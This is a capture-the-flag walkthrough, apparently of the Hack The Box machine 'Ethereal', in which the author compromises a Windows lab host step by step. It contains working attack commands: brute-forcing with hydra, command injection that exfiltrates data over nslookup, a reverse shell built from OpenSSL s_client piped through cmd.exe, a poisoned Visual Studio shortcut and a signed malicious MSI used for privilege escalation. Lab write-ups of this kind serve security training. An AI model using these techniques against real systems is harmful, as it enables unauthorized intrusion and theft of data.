Walkthrough - Ethereal

Tags: , ,

Categories: ,


This machine was absolutely insane, mind boggling and fun at the same time. It took me a lot of painful days to own this machine but eventually, hard work wins. It was definitely not easy to enumerate mainly due to the slow speed and also the way things had to be located. Nonetheless, an awesome machine for learning.


Before following this walkthrough, I highly recommend trying to get the flag yourself! Just like you will hear from everyone else, try harder! (if you cannot find it)

First up, we’ll scan the box using basic nmap scripts and then go from there (Enumerate!).

root@kali:~/Ethereal# nmap -v -p- -sC -sV -oA nmap
# Nmap 7.70 scan initiated Sat Mar 23 11:04:51 2019 as: nmap -v -p- -sC -sV -oA nmap
Nmap scan report for
Host is up (0.11s latency).
Not shown: 65532 filtered ports
21/tcp   open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Cant get directory listing: PASV IP is not the same as
| ftp-syst:
|_  SYST: Windows_NT
80/tcp   open  http    Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ethereal
8080/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Well, so we have a few ports open, port 21, 80 and 8080.


I always like to check the low-hanging fruit first. So let’s get into FTP since anonymous login is allowed. This is a common misconfiguration for FTP logins. You never know what you might find but always is useful.

root@kali:~/Ethereal# ftp
Connected to
220 Microsoft FTP Service
Name ( anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
07-10-18  09:03PM       <DIR>          binaries
09-02-09  08:58AM                 4122 CHIPSET.txt
01-12-03  08:58AM              1173879 DISK1.zip
01-22-11  08:58AM               182396 edb143en.exe
01-18-11  11:05AM                98302 FDISK.zip
07-10-18  08:59PM       <DIR>          New folder
07-10-18  09:38PM       <DIR>          New folder (2)
07-09-18  09:23PM       <DIR>          subversion-1.10.0
11-12-16  08:58AM                 4126 teamcity-server-log4j.xml
226 Transfer complete.

I created a copy of the FTP data on my local drive. Found a zip file FDISK.zip, unzipped it and mounted it as a drive.

root@kali:~/Ethereal/ftp-data# mount FDISK fdisk
root@kali:~/Ethereal/ftp-data# ls -la fdisk/pbox
total 88
drwxr-xr-x 2 root root   512 Jul  2  2018 .
drwxr-xr-x 3 root root  7168 Dec 31  1969 ..
-rwxr-xr-x 1 root root   284 Jul  2  2018 pbox.dat
-rwxr-xr-x 1 root root 81384 Aug 25  2010 pbox.exe

pbox?! What’s that? A little Google-Fu and I found that it’s a password box or a dos-based password manager. So, I used this software to try and load the data from the .dat file.

I copied the pbox.dat file I found in the FTP session to my home directory as .pbox.dat. After executing the pbox client we just downloaded for Linux, it prompted me for the password.

root@kali:~/Ethereal# ./pbox                 
Enter your master password: password

I guessed the password trying out admin, pbox, etc, got it right for password. It opened the following screen.


Using the --dump option, I was able to dump all the usernames and passwords and store them locally.

root@kali:~/Ethereal# ./pbox --dump
Enter your master password: ********
databases  ->  7oth3B@tC4v3!
msdn  ->  alan@ethereal.co / P@ssword1!
learning  ->  alan2 / learn1ng!
ftp drop  ->  Watch3r
backup  ->  alan / Ex3cutiv3Backups
website uploads  ->  R3lea5eR3@dy#
truecrypt  ->  Password8
management server  ->  !C414m17y57r1k3s4g41n!
svn  ->  alan53 / Ch3ck1ToU7>

That was it from FTP. I believe, the tedious process to just be able to obtain a dump is evidence that this box isn’t an wasy one.


In the web browser, we get the following window as a welcome page.


Moving around, I found a menu item called Admin, let’s go there.


Many menu items here as well. The only important one was Ping. Clicking on it redirected me to ethereal.htb:8080 and gave me the following page.


Time to add ethereal.htb to the hosts file. Also, the Notes menu took me to a page where it mentioned the name Alan, ring a bell? It’s the same name that appeared in the pbox dump.


After the hosts file is updated, clicking the Ping option again got me an HTTP authentication page.


Fortunately, we have a list of usernames and passwords from the dump that we obtained earlier. Use that to brute-force the HTTP authentication.

root@kali:~/Ethereal# hydra -L usernames -P passwords -s 8080 -f ethereal.htb http-get /
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

[DATA] max 16 tasks per 1 server, overall 16 tasks, 36 login tries (l:4/p:9), ~3 tries per task
[DATA] attacking http-get://ethereal.htb:8080/
[8080][http-get] host: ethereal.htb   login: alan   password: !C414m17y57r1k3s4g41n!
1 of 1 target successfully completed, 1 valid password found

There’s the login. Using that, we find this page.


I put my IP address in the text-field and it showed Connection to host successful. Let’s try to capture packets this time around using tcpdump.

root@kali:~/Ethereal# tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
12:57:58.345968 IP ethereal.htb > kali: ICMP echo request, id 1, seq 235, length 40
12:57:58.345989 IP kali > ethereal.htb: ICMP echo reply, id 1, seq 235, length 40
12:57:59.616726 IP ethereal.htb > kali: ICMP echo request, id 1, seq 236, length 40
12:57:59.616884 IP kali > ethereal.htb: ICMP echo reply, id 1, seq 236, length 40

We get 2 pings! Looks weird. Based on a guess, it’s running something like ping -n2 <ip>. Let’s find out if this box allows DNS queries. I’ll use & nslookup abcde <myip> in the text field. Try to see it using tcpdump.

root@kali:~/Ethereal# tcpdump -ni tun0 udp port 53
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
19:49:18.150063 IP > 3+ AAAA? abcde. (23)

Great! So we can get data from DNS.

Enumeration using injection

During my really slow enumeration, I found a world writable directory and used & netsh advfirewall firewall show rule name=all dir=out verbose > c:\users\public\desktop\shortcuts\firewall_rules.txt to list all the firewall rules in the .txt file. Using & for /f "eol=- skip=100 tokens=1-10*" %i in (c:\users\public\desktop\shortcuts\firewall_rules.txt) do nslookup %i_%j_%k_%l_%m_%o_%p_%q <my ip>, I got the data in my terminal.

I found that the following rules had been set.

Rule Name: Allow TCP Ports 136
Enabled: Yes
Direction: Out
Profiles: Domain,Private,Public
LocalIP: Any
RemoteIP: Any
Protocol: TCP
LocalPort: Any
RemotePort: 73,136      
Edge traversal: No     
InterfaceTypes: Any      
Security: NotRequired      
Rule source: Local Setting    
Action: Allow  

Also, I located a OpenSSL binary in the C: drive. Using & for /f "usebackq tokens=*" %i in (dir /b c:\progra~2\openss~1.0\bin`) do nslookup %i `, I listed the contents on the folder and found a `openssl.exe` file.

Shell using OpenSSL

Let’s test whether we can connect to a server using this openssl binary. I created key and certificate for our server.

root@kali# openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out cert.pem
Generating a RSA private key
writing new private key to 'key.pem'
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:
root@kali# ls *.pem
cert.pem  key.pem

I ran a OpenSSL server using openssl s_server -quiet -key key.pem -cert cert.pem -port 73 and I used & quiet ( echo "abcde" | c:\progra~2\openss~1.0\bin\openssl.exe s_client -quiet -connect <ip>:73 ) to test the connection.

root@kali# sudo openssl s_server -quiet -key key.pem -cert cert.pem  -port 73

Great! We can send data over using OpenSSL. Now, in order to get a shell, we need to set up two SSL servers running on my machine and use & c:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect <ip>:73 | cmd.exe /k /q | c:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect <ip>:136 to get a shell. I already have a server running on port 73 now we will start one on port 136 and put the command above into the browser.

root@kali# openssl s_server -quiet -key key.pem -cert cert.pem  -port 136
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.


And we have a shell! Let’s hunt for the user.txt file.


I could not find a user.txt file on alan’s desktop but found a note-draft.txt file.

c:\Users\alan\Desktop>type note-draft.txt
I've created a shortcut for VS on the Public Desktop to ensure we use the same version. Please delete any existing shortcuts and use this one instead.

- Alan

Shortcut on a public desktop? Let’s find out.

 Volume in drive C has no label.
 Volume Serial Number is FAD9-1FD5

 Directory of c:\Users\Public\Desktop\Shortcuts

07/17/2018  08:15 PM    <DIR>          .
07/17/2018  08:15 PM    <DIR>          ..
07/06/2018  02:28 PM             6,125 Visual Studio 2017.lnk
               1 File(s)          6,125 bytes
               2 Dir(s)  15,427,989,504 bytes free

I generated a .lnk file using LNKUp using python generate.py --host localhost --type ntlm --output payload.lnk --execute "C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect <myip>:73 | cmd.exe | C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect <myip>:136"

Once we have the .lnk file, we can create a base64 of it and copy it to the system using openssl base64 -A -e -in payload.lnk -out payload.

Now let’s copy the string to the windows machine. To do that we could use echo | set /p="TAAA...Y28AAAAA" > c:/users/public/desktop/shortcuts/b64file.txt, now let’s replace the Visual Studio 2017.lnk file. I will use cd c:\users\public\desktop\shortcuts && c:\progra~2\openssl-v1.1.0\bin\openssl base64 -A -d -in b64file.txt -out "Visual Studio 2017.lnk"

I restarted the OpenSSL shells on port 73 and 136 and within a few seconds, I see this…

root@kali# openssl s_server -quiet -key key.pem -cert cert.pem  -port 136
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.


C:\Users\jorge\Documents>type c:\users\jorge\desktop\user.txt

Awesome! Feel’s good after doing so much, finally we have the user.txt file. But its not over yet.

Privilege escalation

I found two drives mounted on the system, C: and D:, I found the following information from the D: drive.

 Volume in drive D is Development
 Volume Serial Number is 54E5-37D1

 Directory of D:\Certs

07/07/2018  09:50 PM    <DIR>          .
07/07/2018  09:50 PM    <DIR>          ..
07/01/2018  09:26 PM               772 MyCA.cer
07/01/2018  09:26 PM             1,196 MyCA.pvk
               2 File(s)          1,968 bytes
               2 Dir(s)   8,437,514,240 bytes free

Volume in drive D is Development
Volume Serial Number is 54E5-37D1

Directory of D:\DEV\MSIs

07/08/2018  10:09 PM    <DIR>          .
07/08/2018  10:09 PM    <DIR>          ..
07/18/2018  09:47 PM               133 note.txt
               1 File(s)            133 bytes
               2 Dir(s)   8,437,514,240 bytes free

D:\DEV\MSIs>type note.txt
Please drop MSIs that need testing into this folder - I will review regularly. Certs have been added to the store already.

- Rupal               

Next task, create a msi file!? I used a tool called EMCO MSI Package Builder.


C:\Program Files\Microsoft SDKs\Windows\v7.1\Bin>makecert.exe -pe -n "CN=My SPC" -a sha256 -cy end -sky signature -ic \Users\pswapnil\Desktop\myca.cer -iv \Users\pswapnil\Desktop\myca.pvk -sv \Users\pswapnil\Desktop\MySPC.pvk \Users\pswapnil\Desktop\MySPC.cer

C:\Program Files\Microsoft SDKs\Windows\v7.1\Bin>pvk2pfx.exe -pvk \Users\pswapnil\Desktop\MySPC.pvk -spc \Users\pswapnil\Desktop\MySPC.cer -pfx \Users\pswapnil\Desktop\MySPC.pfx

C:\Program Files\Microsoft SDKs\Windows\v7.1\Bin>signtool.exe sign /v /f \Users\pswapnil\Desktop\MySPC.pfx /tr "http://timestamp.digicert.com" /td sha256 /fd sha256 \Users\pswapnil\Desktop\ethereal\ethereal.msi
The following certificate was selected:
    Issued to: My SPC
    Issued by: My CA
    Expires:   Sat Dec 31 15:59:59 2039
    SHA1 hash: 4AE112B8A498C3054308367DD04C80AA921B4BD4

Done Adding Additional Store
Successfully signed and timestamped: \Users\pswapnil\Desktop\ethereal\ethereal.msi

Number of files successfully Signed: 1
Number of warnings: 0
Number of errors: 0

Let’s copy the msi to the system using openssl s_server -quiet -key key.pem -cert cert.pem -port 73 < ethereal.msi and run & c:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect <myip>:73 > c:\users\public\desktop\shortcuts\ethereal.msi on the web form.

C:\Users\jorge\Documents>cd c:\users\public\desktop\shortcuts
C:\Users\Public\Desktop\Shortcuts>copy /y ethereal.msi d:\DEV\MSIs

After copying the msi to the D: drive, I got the root.txt a few seconds later.

C:\Users\Public\Desktop\Shortcuts>type getmeroot.txt

Finally! So much to do in this box. A great experience nonetheless.

Happy Hacking! Cheers!